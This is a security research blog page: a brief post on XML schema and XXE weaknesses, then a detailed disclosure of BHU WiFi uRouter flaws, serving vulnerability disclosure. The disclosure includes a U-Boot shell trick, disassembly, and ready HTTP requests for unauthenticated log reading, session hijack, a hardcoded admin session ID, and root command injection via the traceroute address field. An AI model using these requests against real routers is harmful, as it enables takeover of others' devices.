RESEARCH | October 18, 2016

Let’s Terminate XML Schema Vulnerabilities

XML eXternal Entity (XXE) attacks are a common threat to applications using XML schemas, either actively or unknowingly. That is because we continue to use XML schemas that can be abused in multiple ways. Programming languages and libraries use XML schemas to define the expected contents of XML documents, SAML authentications or SOAP messages. XML schemas were intended to constrain document definitions, yet they have introduced multiple attack avenues.

XML parsers should be prepared to manage two types of problematic XML documents: malformed files and invalid files. Malformed files do not follow the World Wide Web Consortium (W3C) specification. This results in unexpected consequences for any software that parses the file. Invalid files abuse XML schemas and exploit actions that are built into programming languages and libraries. This may unwillingly put any software relying on these technologies at risk.

I analyzed possible attacks affecting XML and discovered new attacks in the previous categories. Among them:

  • Schema version disclosure: Parsers may disclose type and version information when retrieving remote schemas.
  • Unrestrictive schemas: Major companies still rely on schemas that cannot provide the restrictions required for their XML documents. DTD schemas continue to be common, even though they are often unable to accomplish their goal.
  • Improper data validation: As companies move away from DTD schemas and attempt to implement better restrictions, they may provide incomplete protection for their systems. XML schemas provide highly granular constraints, and if they are not properly defined, the approved document may affect the underlying security of applications.

Some of the proposed examples provided by the W3C include vulnerable methods of defining XML documents. To illlustrate with a basic example, the W3C states that an application can use a DTD to verify that XML data is valid, and provides the following example:

<?xml version=”1.0″?>
<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to (#PCDATA)>
  <!ELEMENT from (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
]>
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don’t forget me this weekend</body>
</note>

This example document contains an embedded DTD that constrains the contents to the previously defined elements. However, those elements do not provide a constraint on how large they are or what type of data they contain. Moreover, since the DTD declaration can simply be changed or removed from the previous document, you can even have a valid, well-formed document without an XML schema.

For more details and greater depth on this topic, view the full white paper, Assessing and Exploiting XML Schema’s Vulnerabilities.

As always, we would love to hear from other security types who might have a differing opinion. All of our positions are subject to change through exposure to compelling arguments and/or data.

RESEARCH | August 17, 2016

Multiple Vulnerabilities in BHU WiFi “uRouter”

A Wonderful (and !Secure) Router from China

The BHU WiFi uRouter, manufactured and sold in China, looks great – and it contains multiple critical vulnerabilities. An unauthenticated attacker could bypass authentication, access sensitive information stored in its system logs, and in the worst case, execute OS commands on the router with root privileges. In addition, the uRouter ships with hidden users, SSH enabled by default and a hardcoded root password…and injects a third-party JavaScript file into all users’ HTTP traffic.

In this blog post, we cover the main security issues found on the router, and describe how to exploit the UART debug pins to extract the firmware and find security vulnerabilities.

Souvenir from China

During my last trip to China, I decided to buy some souvenirs. By “souvenirs”, I mean Chinese brand electronic devices that I couldn’t find at home.

I found the BHU WiFi uRouter, a very nice looking router, for €60. Using a translator on the vendor’s webpage, its Chinese name translated to “Tiger Will Power”, which seemed a little bit off. Instead, I renamed it “uRouter” based on the name of the URL of the product page – http://www.bhuwifi.com/product/urouter_gs.html.

Of course, everything in the administrative web interface was in Chinese, without an option to switch to English. Translators did not help much, so I decided to open it up and see if I could access the firmware.

Extracting the Firmware using UART


If you look at the photo above, there appear to be UART pins (red) with the connector still attached, and an SD card (orange). I used BusPirate to connect to the pins.
 

I booted the device and watched my terminal:

 

U-Boot 1.1.4 (Aug 19 2015 – 08:58:22)
 
BHU Urouter
DRAM: 
sri
Wasp 1.1
wasp_ddr_initial_config(249): (16bit) ddr2 init
wasp_ddr_initial_config(426): Wasp ddr init done
Tap value selected = 0xf [0x0 – 0x1f]
Setting 0xb8116290 to 0x23462d0f
64 MB
Top of RAM usable for U-Boot at: 84000000
Reserving 270k for U-Boot at: 83fbc000
Reserving 192k for malloc() at: 83f8c000
Reserving 44 Bytes for Board Info at: 83f8bfdserving 36 Bytes for Global Data at: 83f8bfb0
Reserving 128k for boot params() at: 83f6bfb0
Stack Pointer at: 83f6bf98
Now running in RAM – U-Boot at: 83fbc000
Flash Manuf Id 0xc8, DeviceId0 0x40, DeviceId1 0x18
flash size 16MB, sector count = 256
Flash: 16 MB
In:    serial
Out:   serial
Err:   serial
 
 ______  _     _ _     _
 |_____] |_____| |     |
 |_____] |     | |_____| Networks Co’Ltd Inc.
 
Net:   ag934x_enet_initialize…
No valid address in Flash. Using fixed address
No valid address in Flashng fixed address
 wasp  reset mask:c03300
WASP —-> S27 PHY
: cfg1 0x80000000 cfg2 0x7114
eth0: 00:03:7f:09:0b:ad
s27 reg init
eth0 setup
WASP —-> S27 PHY
: cfg1 0x7 cfg2 0x7214
eth1: 00:03:7f:09:0b:ad
s27 reg init lan
ATHRS27: resetting done
eth1 setup
eth0, eth1
Http reset check.
Trying eth0
eth0 link down
FAIL
Trying eth1
eth1 link down
FAIL
Hit any key to stop autoboot:  0 (1)

 

/* [omitted] */
Pressing a key (1) stopped the booting process and landed on the following bootloader menu (the typos are not mine):

 

 

##################################
#   BHU Device bootloader menu   #
##################################
[1(t)] Upgrade firmware with tftp
[2(h)] Upgrade firmware with httpd
[3(a)] Config device aerver IP Address
[4(i)] Print device infomation
[5(d)] Device test
[6(l)] License manager
[0(r)] Redevice

 

[ (c)] Enter to commad line (2)

I pressed c to access the command line (2). Since it’s using U-Boot (as specified in the serial output), I could modify the bootargs parameter and pop a shell instead of running the init program:

Please input cmd key:
CMD> printenv bootargs
bootargs=board=Urouter console=ttyS0,115200 root=31:03 rootfstype=squashfs,jffs2 init=/sbin/init (3)mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1408k(kernel),8448k(rootfs),1408k(kernel2),1664k(rescure),2944kr),64k(cfg),64k(oem),64k(ART)
CMD> setenv bootargs board=Urouter console=ttyS0,115200 rw rootfstype=squashfs,jffs2 init=/bin/sh (4) mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1408k(kernel),8448k(rootfs),1408k(kernel2),1664k(rescure),2944kr),64k(cfg),64k(oem),64k(ART)

 

CMD> boot (5)
 
Checking the default U-Boot configuration (3) using the command printenv, it will run ‘/sbin/init’ as soon as the booting sequence finishes. This binary is responsible for initializing the Linux operating system of the router.
Replacing ‘/sbin/init’ with ‘/bin/sh’ (4) using the setenv command will run the shell binary instead so that we can access the filesystem. The boot command (5) tells U-Boot to continue the boot sequence we just paused. After a lot of debug information, we get the shell:

 

 
BusyBox v1.19.4 (2015-09-05 12:01:45 CST) built-in shell (ash)
Enter ‘help’ for a list of built-in commands.
 
# ls
version  upgrade  sbin     proc     mnt      init     dev
var      tmp      root     overlay  linuxrc  home     bin
usr      sys      rom      opt      lib      etc
 

 

With shell access to the router, I could then extract the firmware and start analyzing the Common Gate Interface (CGI) responsible for handling the administrative web interface.  

There were multiple ways to extract files from the router at that point. I modified the U-Boot parameters to enable the network (http://www.denx.de/wiki/view/DULG/LinuxBootArgs) and used scp (available on the router) to copy everything to my laptop.  

Another way to do this would be to analyze the recovery.img firmware image stored on the SD card. However, this would risk missing pre-installed files or configuration settings that are not in the recovery image.

Reverse Engineering the CGI Binaries
 

My first objective was to understand which software is handling the administrative web interface, and how. Here’s the startup configuration of the router:

 

# cat /etc/rc.d/rc.local
/* [omitted] */
mongoose-listening_ports 80 &

 

/* [omitted] */
Mongoose  is a web server found on embedded devices. Since no mongoose.conf file appears on the router, it would use the default configuration. According to the documentation , Mongoose will interpret all files ending with .cgi as CGI binaries by default, and there are two on the router’s filesystem:

 

# ls -al /usr/share/www/cgi-bin/
-rwxrwxr-x    1     29792 cgiSrv.cgi
-rwxrwxr-x    1     16260 cgiPage.cgi
drwxr-xr-x    2         0 ..

 

drwxrwxr-x    2        52 .

The administrative web interface relies on two binaries: 

  1. cgiPage.cgi, which seems to handle the web panel home page (http://192.168.62.1/cgi-bin/cgiPage.cgi?pg=urouter (resource no longer available))
  2. cgiSrv.cgi, which handles the administrative functions (such as logging in and out, querying system information, or modifying system configuration

The cgiSrv.cgi binary appeared to be the most interesting, since it can update the router’s configuration, so I started with that.

 

$ file cgiSrv.cgi

 

cgiSrv.cgi: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked (uses shared libs), stripped

Although the binary is stripped of all debugging symbols such as function names, it’s quite easy to understand when starting from the main function. For analysis of the binaries, I used IDA:

 
LOAD:00403C48  # int __cdecl main(int argc, const char **argv, const char **envp)
LOAD:00403C48                 .globl main
LOAD:00403C48 main:                                    # DATA XREF: _ftext+18|o
/* [omitted] */
LOAD:00403CE0                 la      $t9, getenv
LOAD:00403CE4                 nop
                          (6) # Retrieve the request method
LOAD:00403CE8                 jalr    $t9 ; getenv
                          (7) # arg0 = “REQUEST_METHOD”
LOAD:00403CEC                 addiu   $a0, $s0, (aRequest_method – 0x400000)  # “REQUEST_METHOD”
LOAD:00403CF0                 lw      $gp, 0x20+var_10($sp)
LOAD:00403CF4                 lui     $a1, 0x40
                          (8) # arg0 = getenv(“REQUEST_METHOD”)
LOAD:00403CF8                 move    $a0, $v0
LOAD:00403CFC                 la      $t9, strcmp
LOAD:00403D00                 nop
                          (9) # Check if the request method is POST
LOAD:00403D04                 jalr    $t9 ; strcmp
                          (10) # arg1 = “POST”
LOAD:00403D08                 la      $a1, aPost       # “POST”
LOAD:00403D0C                 lw      $gp, 0x20+var_10($sp)
                          (11) # Jump if not POST request
LOAD:00403D10                 bnez    $v0, loc_not_post
LOAD:00403D14                 nop
                          (12) # Call handle_post if POST request
LOAD:00403D18                 jal     handle_post
LOAD:00403D1C                 nop

/* [omitted] */


The main function starts by calling getenv (6) to retrieve the request method stored in the environment variable “REQUEST_METHOD” (7). Then it calls strcmp (9) to compare the REQUEST_METHOD value (8) with the string “POST” (10). If the strings are equal (11), the function in (12) is called.

In other words, whenever a POST request is received, the function in (12) is called. I renamed it handle_post for clarity. 

The same logic applies for GET requests, where if a GET request is received it calls the corresponding handler function, renamed handle_get.

Let’s start with handle_get, which looks simpler than does the handler for POST requests.

The cascade-like series of blocks could indicate an “if {} else if {} else {}” pattern, where each test will check for a supported GET operation.

Focusing on Block A:

 

/* [omitted] */
LOAD:00403B3C loc_403B3C:                              # CODE XREF: handle_get+DC|j
LOAD:00403B3C                 la      $t9, find_val
                          (13) # arg1 = “file”
LOAD:00403B40                 la      $a1, aFile       # “file”
                          (14) # Retrieve value of parameter “file” from URL
LOAD:00403B48                 jalr    $t9 ; find_val
                          (15) # arg0 = url
LOAD:00403B4C                 move    $a0, $s2  # s2 = URL
LOAD:00403B50                 lw      $gp, 0x130+var_120($sp)
                          (16) # Jump if URL not like “?file=”
LOAD:00403B54                 beqz    $v0, loc_not_file_op
LOAD:00403B58                 move    $s0, $v0
                          (17) # Call handler for “file” operation
LOAD:00403B5C                 jal     get_file_handler

 

LOAD:00403B60                 move    $a0, $v0

 In Block A, handler_get checks for the string file” (13) in the URL parameters (15) by calling find_val (14). If the string appears (16), the function get_file_handler is called (17).

 

 

LOAD:00401210 get_file_handler:                        # CODE XREF: handle_get+140|p
/* [omitted] */
LOAD:004012B8 loc_4012B8:                              # CODE XREF: get_file_handler+98j
LOAD:004012B8                 lui     $s0, 0x41
LOAD:004012BC                 la      $t9, strcmp
                          (18) # arg0 = Value of parameter “file”
LOAD:004012C0                 addiu   $a1, $sp, 0x60+var_48
                          (19) # arg1 = “syslog”
LOAD:004012C4                 lw      $a0, file_syslog  # “syslog”
LOAD:004012C8                 addu    $v0, $a1, $v1
                          (20) # Is value of file “syslog”?
LOAD:004012CC                 jalr    $t9 ; strcmp
LOAD:004012D0                 sb      $zero, 0($v0)
LOAD:004012D4                 lw      $gp, 0x60+var_50($sp)
                          (21) # Jump if value of “file” != “syslog”
LOAD:004012D8                 bnez    $v0, loc_not_syslog
LOAD:004012DC                 addiu   $v0, $s0, (file_syslog – 0x410000)
                          (22) # Return “/var/syslog” if “syslog”
LOAD:004012E0                 lw      $v0, (path_syslog – 0x416500)($v0)  # “/var/syslog”
LOAD:004012E4                 b     
loc_4012F0 LOAD:004012E8                 nop
LOAD:004012EC  # —————————————————————————
LOAD:004012EC LOAD:004012EC loc_4012EC:                              # CODE XREF: get_file_handler+C8|j
                          (23) # Return NULL otherwise

 

LOAD:004012EC                 move    $v0, $zero
The function get_file_handler checks to determine whether the value of the URL parameter file (18) is syslog (19) by calling strcmp (20). If that is the case (21), it returns the string /var/syslog” (22), otherwise, it returns NULL (23). Next, a function is called to open the file /var/syslog, read its contents and write it to the server’s HTTP response. This execution flow is straightforward. It took a mere couple of minutes to find the handler for GET requests and understand how the requests were processed.
Looking at the reverse-engineered blocks, we can see the following GET operations:
  • page=[<html page name>]
    • Append “.html” to the HTML page name
    • Open the file and return its content
    • If you’re wondering, yes, it is vulnerable to path traversal, but restricted to .html files. I could not find a way to bypass the extension restriction.
  • xml=[<configuration name>]
    • Access the configuration name
    • Return the value in XML format
  • file=[syslog]
    • Access /var/syslog
    • Open the file and return its content
  • cmd=[system_ready]
    • Return the first and last letters of the admin password (reducing the entropy of the password and making it easier for an attacker to brute-force)

Did We Forget to Invite Authentication to the Party? Zut…

 
But wait – when accessing syslog, does it check for an authenticated user? To all appearances, at no point does the cgiSrv.cgi binary check for authentication when accessing the router’s system logs.

Well, maybe the logs don’t contain any sensitive information…

Request:

 

GET /cgi-bin/cgiSrv.cgi?file=[syslog] HTTP/1.1
Host: 192.168.62.1
X-Requested-With: XMLHttpRequest

Connection: close

 

Response:

HTTP/1.1 200 OK
Content-type: text/plain
 
Jan  1 00:00:09 BHU syslog.info syslogd started: BusyBox v1.19.4
Jan  1 00:00:09 BHU user.notice kernel: klogger started!
Jan  1 00:00:09 BHU user.notice kernel: Linux version 2.6.31-BHU (yetao@BHURD-Software) (gcc version 4.3.3 (GCC) ) #1 Thu Aug 20 17:02:43 CST 201
/* [omitted] */
Jan  1 00:00:11 BHU local0.err dms[549]: Admin:dms:3 sid:700000000000000 id:0 login
/* [omitted] */

Jan  1 08:02:19 HOSTNAME local0.warn dms[549]: User:admin sid:2jggvfsjkyseala index:3 login     

…Or maybe they do. As seen above, these logs contain, among other information, the session ID (SID) value of the admin cookie. If we use that cookie value in our browser, we can hijack the admin session and reboot the device:

 

POST /cgi-bin/cgiSrv.cgi HTTP/1.1
Host: 192.168.62.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.62.1/
Cookie: sid=2jggvfsjkyseala;
Content-Length: 9
Connection: close
 

 

op=reboot

Response:

 
HTTP/1.1 200 OK
Content-type: text/plain
 
result=ok


But wait, there’s more! In the (improbable) scenario where the admin has never logged into the router, and therefore doesn’t have an SID cookie value in the system logs, we can still use the hardcoded SID: 700000000000000. Did you notice it in the system log we saw earlier?

 

/* [omitted] */
Jan  1 00:00:11 BHU local0.err dms[549]: Admin:dms:3 sid:700000000000000 id:0 login

 

/* [omitted] */
This SID is constant across reboots, and the admin can’t change it. This provides us with access to all authenticated features. How nice! 🙂

Request to check which user we are: 

 

POST /cgi-bin/cgiSrv.cgi HTTP/1.1
Host: 192.168.62.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 7
Cookie: sid=700000000000000
Connection: close
 
op=user

Response:

 
HTTP/1.1 200 OK
Content-type: text/plain
 
user=dms:3

Who is dms:3? It’s not referenced anywhere on the administrative web interface. Is it a bad design choice, a hack from the developers? Or is it some kind of backdoor account?

Could It Be More Broken?

 
Now that we can access the web interface with admin privileges, let’s push on a little bit further. Let’s have a look at the POST handler function and see if we can find something more interesting. 

Checking the graph overview of the POST handler on IDA, it looks scarier than the GET handler. However, we’ll split the work into smaller tasks in order to understand what happens.

In the snippet above, we can find a similar structure as in the GET handler: a cascade-like series of blocks. In Block A, we have the following:

 
LOAD:00403424                 la      $t9, cgi_input_parse
LOAD:00403428                 nop
                          (24) # Call cgi_input_parse()
LOAD:0040342C                 jalr    $t9 ; cgi_input_parse
LOAD:00403430                 nop
LOAD:00403434                 lw      $gp, 0x658+var_640($sp)
                          (25) # arg1 = “op”
LOAD:00403438                 la      $a1, aOp         # “op”
LOAD:00403440                 la      $t9, find_val
                          (26) # arg0 = Body of the request
LOAD:00403444                 move    $a0, $v0
                          (27) # Get value of parameter “op”
LOAD:00403448                 jalr    $t9 ; find_val
LOAD:0040344C                 move    $s1, $v0
LOAD:00403450                 move    $s0, $v0
LOAD:00403454                 lw      $gp, 0x658+var_640($sp)
                          (28) # No “op” parameter, then exit

 

LOAD:00403458                 beqz    $s0, b_exit

 

This block parses the body of the POST requests (24) and tries to extract the value of the parameter op (25) from the body (26) by calling the function find_val (27). If find_val returns NULL (i.e., the value of op does not exist), it goes straight to the end of the function (28). Otherwise, it continues towards Block B.
 

Block B does the following:

 

 

LOAD:004036B4                 la      $t9, strcmp
                          (29) # arg1 = “reboot”
LOAD:004036B8                 la      $a1, aReboot     # “reboot”
                          (30) # Is “op” the command “reboot”?
LOAD:004036C0                 jalr    $t9 ; strcmp
                          (31) # arg0 = body[“op”]
LOAD:004036C4                 move    $a0, $s0
LOAD:004036C8                 lw      $gp, 0x658+var_640($sp)
LOAD:004036CC                 bnez    $v0, loc_403718

 

LOAD:004036D0                 lui     $s2, 0x40
 

 

It calls the strcmp function (30) with the result of find_val from Block A as the first parameter (31). The second parameter is the string reboot” (29). If the op parameter has the value reboot, then it moves to Block C:

 

(32)# Retrieve the cookie SID value
LOAD:004036D4                 jal     get_cookie_sid
LOAD:004036D8                 nop
LOAD:004036DC                 lw      $gp, 0x658+var_640($sp)
                          (33) # SID cookie passed as first parameter for dml_dms_ucmd
LOAD:004036E0                 move    $a0, $v0
LOAD:004036E4                 li      $a1, 1
LOAD:004036E8                 la      $t9, dml_dms_ucmd
LOAD:004036EC                 li      $a2, 3
LOAD:004036F0                 move    $a3, $zero
                          (34) # Dispatch the work to dml_dms_ucmd
LOAD:004036F4                 jalr    $t9 ; dml_dms_ucmd

 

LOAD:004036F8                 nop

 

It first calls a function I renamed get_cookie_sid (32), passes the returned value to dml_dms_ucmd (33) and calls it (34). Then it moves on:

 

                          (35) # Save returned value in v1
LOAD:004036FC                 move    $v1, $v0
LOAD:00403700                 li      $v0, 0xFFFFFFFE
LOAD:00403704                 lw      $gp, 0x658+var_640($sp)
                          (36) # Is v1 != 0xFFFFFFFE?
LOAD:00403708                 bne     $v1, $v0, loc_403774
LOAD:0040370C                 lui     $a0, 0x40
                          (37) # If v1 == 0xFFFFFFFE jump to error message
LOAD:00403710                 b       loc_need_login
LOAD:00403714                 nop
/* [omitted] */
LOAD:00403888 loc_need_login:                              # CODE XREF: handle_post+9CC|j
LOAD:00403888                 la      $t9, mime_header
LOAD:0040388C                 nop
LOAD:00403890                 jalr    $t9 ; mime_header
LOAD:00403894                 addiu   $a0, (aTextXml – 0x400000)  # “text/xml”
LOAD:00403898                 lw      $gp, 0x658+var_640($sp)
LOAD:0040389C                 lui     $a0, 0x40
                          (38) # Show error message “need_login”
LOAD:004038A0                 la      $t9, printf LOAD:004038A4       b       loc_4038D0

 

LOAD:004038A8                 la      $a0, aReturnItemResu  # “<return>nt<ITEM result=”need_login””…
It checks the return value of dml_dms_ucmd (35) against 0xFFFFFFFE (or -2 in signed integer) (36). If they are different, the command succeeds. But if they are equal (37), it displays the need_login error message (38).

For instance, when no SID cookie is specified, we observe the following response from the server.

Request without any cookie:    
  

 

POST /cgi-bin/cgiSrv.cgi HTTP/1.1
Host: 192.168.62.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 9
Connection: close

 

op=reboot
 

  Response:    

 

HTTP/1.1 200 OK
Content-type: text/xml
 
<return>
      <ITEM result=”need_login”/>
</return>

 

The same pattern occurs for the other operations:
  •         Receive POST request/op=<name>
  •          Call get_cookie_sid
  •         Call dms_dms_ucmd  
This is a major difference compared to the GET handler. While the GET handler performs the action right away – no questions asked – the POST handler refers to the SID cookie at some point. But how is it used?

First, we check to see what get_cookie_sid does:

 

LOAD:004018C4 get_cookie_sid:                          # CODE XREF: get_xml_handle+20|p
/* [omitted] */
LOAD:004018DC                 la      $t9, getenv
LOAD:004018E0                 lui     $a0, 0x40
                          (39) # Get HTTP cookies
LOAD:004018E4                 jalr    $t9 ; getenv
LOAD:004018E8                 la      $a0, aHttp_cookie  # “HTTP_COOKIE”
LOAD:004018EC                 lw      $gp, 0x20+var_10($sp)
LOAD:004018F0                 beqz    $v0, failed
LOAD:004018F4                 lui     $a1, 0x40
LOAD:004018F8                 la      $t9, strstr
LOAD:004018FC                 move    $a0, $v0
                          (40) # Is there a cookie containing “sid=”?
LOAD:00401900                 jalr    $t9 ; strstr
LOAD:00401904                 la      $a1, aSid        # “sid=”
LOAD:00401908                 lw      $gp, 0x20+var_10($sp)
LOAD:0040190C                 beqz    $v0, failed
LOAD:00401910                 move    $v1, $v0
/* [omitted] */
LOAD:00401954 loc_401954:                              # CODE XREF: get_cookie_sid+6C|j
LOAD:00401954                 addiu   $s0, (session_buffer – 0x410000)
LOAD:00401958
LOAD:00401958 loc_401958:                              # CODE XREF: get_cookie_sid+74|j
LOAD:00401958                 la      $t9, strncpy
LOAD:0040195C                 addu    $v0, $a2, $s0
LOAD:00401960                 sb      $zero, 0($v0)
                          (41) # Copy value of cookie in “session_buffer”
LOAD:00401964                 jalr    $t9 ; strncpy
LOAD:00401968                 move    $a0, $s0
LOAD:0040196C                 lw      $gp, 0x20+var_10($sp)
LOAD:00401970                 b       loc_40197C
                          (42) # Return the value of the cookie

 

LOAD:00401974                 move    $v0, $s0
In short, get_session_cookie will retrieve the HTTP cookies sent with the POST request (39) and check to determine whether one cookie contains sid in its name (40). Then it saves the cookie value in a global variable (41) and returns its value (42).


The returned value then passes as the first parameter when calling dml_dms_ucmd (implemented in the libdml.so library). The authentication check surely must be in this function, right? Let’s have a look:

 

.text:0003B368 .text:0003B368                 .globl dml_dms_ucmd
.text:0003B368 dml_dms_ucmd:
.text:0003B368
/* [omitted] */
.text:0003B3A0                 move    $s3, $a0
.text:0003B3A4                 beqz    $v0, loc_3B71C
.text:0003B3A8                 move    $s4, $a3
                           (43) # Remember that a0 = SID cookie value.
                               # In other word, if a0 is NULL, s1 = 0xFFFFFFFE
.text:0003B3AC                 beqz    $a0, loc_exit_function
.text:0003B3B0                 li      $s1, 0xFFFFFFFE
/* [omitted] */
.text:0003B720 loc_exit_function:                           # CODE XREF: dml_dms_ucmd+44|j
.text:0003B720                                          # dml_dms_ucmd+390|j …
.text:0003B720                 lw      $ra, 0x40+var_4($sp)
                           (44) # Return s1 (s1 = 0xFFFFFFFE)
.text:0003B724                 move    $v0, $s1
/* [omitted] */
.text:0003B73C                 jr      $ra
.text:0003B740                 addiu   $sp, 0x40

 

.text:0003B740  # End of function dml_dms_ucmd

 

Above is the only reference to 0xFFFFFFFE (-2) I could find in dml_dms_ucmd. The function will return -2 (44) when its first parameter is NULL (43), meaning only when the SID is NULL.

…Wait a second…that would mean that…no, it can’t be that broken?

Here’s a request with a random cookie value:

 

 
POST /cgi-bin/cgiSrv.cgi HTTP/1.1
Host: 192.168.62.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: abcsid=def
Content-Length: 9
Connection: close
 
op=reboot

Response:

HTTP/1.1 200 OK
Content-type: text/plain
 
result=ok

Yes, it does mean that whatever SID cookie value you provide, the router will accept it as proof that you’re an authenticated user!

From Admin to Root

So far, we have three possible ways to gain admin access to the router’s administrative web interface:
  •          Provide any SID cookie value
  •         Read the system logs and use the listed admin SID cookie values
  •         Use the hardcoded hidden 700000000000000 SID cookie value


Our next step is to try elevating our privileges from admin to root user.

We have analyzed the POST request handler and understood how the op requests were processed, but the POST handler can also handle XML requests:

 

/* [omitted] */
LOAD:00402E2C                 addiu   $a0, $s2, (aContent_type – 0x400000)  # “CONTENT_TYPE”
LOAD:00402E30                 la      $t9, getenv
LOAD:00402E34                 nop
                          (45) # Get the “CONTENT_TYPE” of the request
LOAD:00402E38                 jalr    $t9 ; getenv
LOAD:00402E3C                 lui     $s0, 0x40
LOAD:00402E40                 lw      $gp, 0x658+var_640($sp)
LOAD:00402E44                 move    $a0, $v0
LOAD:00402E48                 la      $t9, strstr
LOAD:00402E4C                 nop
                          (46) # Is it a “text/xml” request?
LOAD:00402E50                 jalr    $t9 ; strstr
LOAD:00402E54                 addiu   $a1, $s0, (aTextXml – 0x400000)  # “text/xml”
LOAD:00402E58                 lw      $gp, 0x658+var_640($sp)
LOAD:00402E5C                 beqz    $v0, b_content_type_specified
/* [omitted] */
                          (47) # Get SID cookie value
LOAD:00402F88                 jal     get_cookie_sid
LOAD:00402F8C                 and     $s0, $v0
LOAD:00402F90                 lw      $gp, 0x658+var_640($sp)
LOAD:00402F94                 move    $a1, $s0
LOAD:00402F98                 sw      $s1, 0x658+var_648($sp)
LOAD:00402F9C                 la      $t9, dml_dms_uxml
LOAD:00402FA0                 move    $a0, $v0
LOAD:00402FA4                 move    $a2, $s3
                          (48) # Calls ‘dml_dms_uxml’ with request body and SID cookie value
LOAD:00402FA8                 jalr    $t9 ; dml_dms_uxml

LOAD:00402FAC                 move    $a3, $s2

When receiving a request with a content type (45) containing text/xml (46), the POST handler retrieves the SID cookie value (47) and calls dml_dms_uxml (48), implemented in libdml.so. Somehow, dml_dms_uxml is even nicer than dml_dms_ucmd:

 

 

.text:0003AFF8                 .globl dml_dms_uget_xml
.text:0003AFF8 dml_dms_uget_xml:
/* [omitted] */
                           (49) # Copy SID in s1
.text:0003B030                 move    $s1, $a0
.text:0003B034                 beqz    $a2, loc_3B33C
.text:0003B038                 move    $s5, $a3
                           (50) # If SID is NULL
.text:0003B03C                 bnez    $a0, loc_3B050
.text:0003B040                 nop
.text:0003B044                 la      $v0, unk_170000
.text:0003B048                 nop
                           (51) # Replace NULL SID with the hidden hardcoded one
.text:0003B04C                 addiu   $s1, $v0, (a70000000000000 – 0x170000)  # “700000000000000”

 

/* [omitted] */

 

The difference between dml_dms_uxml and dml_dms_ucmd is that dml_dms_uxml will use the hardcoded hidden SID value 700000000000000 (51) whenever the SID value from the user (49) is NULL (50).
In other words, we don’t even need to be authenticated to use the function. “If you can’t afford a SID cookie value, one will be appointed for you.” Thank you, BHU WiFi, for making it so easy for us!

The function dml_dms_uxml is responsible for parsing the XML in the request body and finding the corresponding callback function. For instance, when receiving the following XML request:

POST /cgi-bin/cgiSrv.cgi HTTP/1.1
Host: 192.168.62.1
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
 
<cmd>
<ITEM cmd=”traceroute”addr=”127.0.0.1″ />

 

</cmd> 

 

The function dml_dms_uxml will check the cmd parameter and find the function handling the traceroute command. The traceroute handler is defined in libdml.so as well, within the function dl_cmd_traceroute:

 

.text:000AD834                 .globl dl_cmd_traceroute
.text:000AD834 dl_cmd_traceroute:                       # DATA XREF: .got:dl_cmd_traceroute_ptr|o
.text:000AD834
/* [omitted] */
                           (52) # arg0 = XML data
.text:000AD86C                 move    $s3, $a0
                           (53) # Retrieve the value of parameter “address” or “addr”
.text:000AD870                 jalr    $t9 ; conf_find_value
                           (54) # arg1 = “address/addr”
.text:000AD874                 addiu   $a1, (aAddressAddr – 0x150000)  # “address/addr”
.text:000AD878                 lw      $gp, 0x40+var_30($sp)
.text:000AD87C                 beqz    $v0, loc_no_addr_value
                           (55) # s0 = XML[“address”]
.text:000AD880                 move    $s0, $v0

 

First, dl_cmd_traceroute tries to retrieve the value of the parameter named address or addr (54) in the XML data (52) by calling conf_find_value (53) and stores it in s0 (55).

Moving forward:

 

.text:000AD920                 la      $t9, dms_task_new
                           (56) # arg0 = dl_cmd_traceroute_th
.text:000AD924                 la      $a0, dl_cmd_traceroute_th
                               # arg1 = 0
.text:000AD928                 move    $a1, $zero
                           (57) # Spawn new task by calling the function in arg0 with arg3 parameter
.text:000AD92C                 jalr    $t9 ; dms_task_new
                           (58) # arg3 = XML[“address”]
.text:000AD930                 move    $a2, $s1
.text:000AD934                 lw      $gp, 0x40+var_30($sp)
.text:000AD938                 bltz    $v0, loc_ADAB4
It calls dms_task_new (57), which starts a new thread and calls dl_cmd_traceroute_th (56) with the value of the address parameter (58).
 

Let’s have a look at dl_cmd_traceroute_th:

 

.text:000ADAD8                 .globl dl_cmd_traceroute_th
.text:000ADAD8 dl_cmd_traceroute_th:                    # DATA XREF: dl_cmd_traceroute+F0|o
.text:000ADAD8                                          # .got:dl_cmd_traceroute_th_ptr|o
/* [omitted] */
.text:000ADB08                 move    $s1, $a0
.text:000ADB0C                 addiu   $s0, $sp, 0x130+var_110
.text:000ADB10                 sw      $v1, 0x130+var_11C($sp)
                           (59) # arg1 = “/bin/script…”
.text:000ADB14                 addiu   $a1, (aBinScriptTrace – 0x150000)  # “/bin/script/tracepath.sh %s”
                           (60) # arg0 = formatted command
.text:000ADB18                 move    $a0, $s0         # s
                           (61) # arg2 = XML[“address”]
.text:000ADB1C                 addiu   $a2, $s1, 8
                           (62) # Format the command with user-supplied parameter
.text:000ADB20                 jalr    $t9 ; sprintf
.text:000ADB24                 sw      $v0, 0x130+var_120($sp)
.text:000ADB28                 lw      $gp, 0x130+var_118($sp)
.text:000ADB2C                 nop
.text:000ADB30                 la      $t9, system
.text:000ADB34                 nop
                           (63) # Call system with user-supplied parameter
.text:000ADB38                 jalr    $t9 ; system
                           (64) # arg0 = Previously formatted command
.text:000ADB3C                 move    $a0, $s0         # command
 

 

The dl_cmd_traceroute_th function first calls sprintf (62) to format the XML address value (61) into the string /bin/script/tracepath.sh %s” (59) and stores the formatted command in a local buffer (60). Then it calls system (63) with the formatted command (64).


Using our previous request, dl_cmd_traceroute_th will execute the following:

system(“/bin/script/tracepath.sh 127.0.0.1”)

As you may have already determined, there is absolutely no sanitization of the XML address value, allowing an OS command injection. In addition, the command runs with root privileges:

 

POST /cgi-bin/cgiSrv.cgi HTTP/1.1
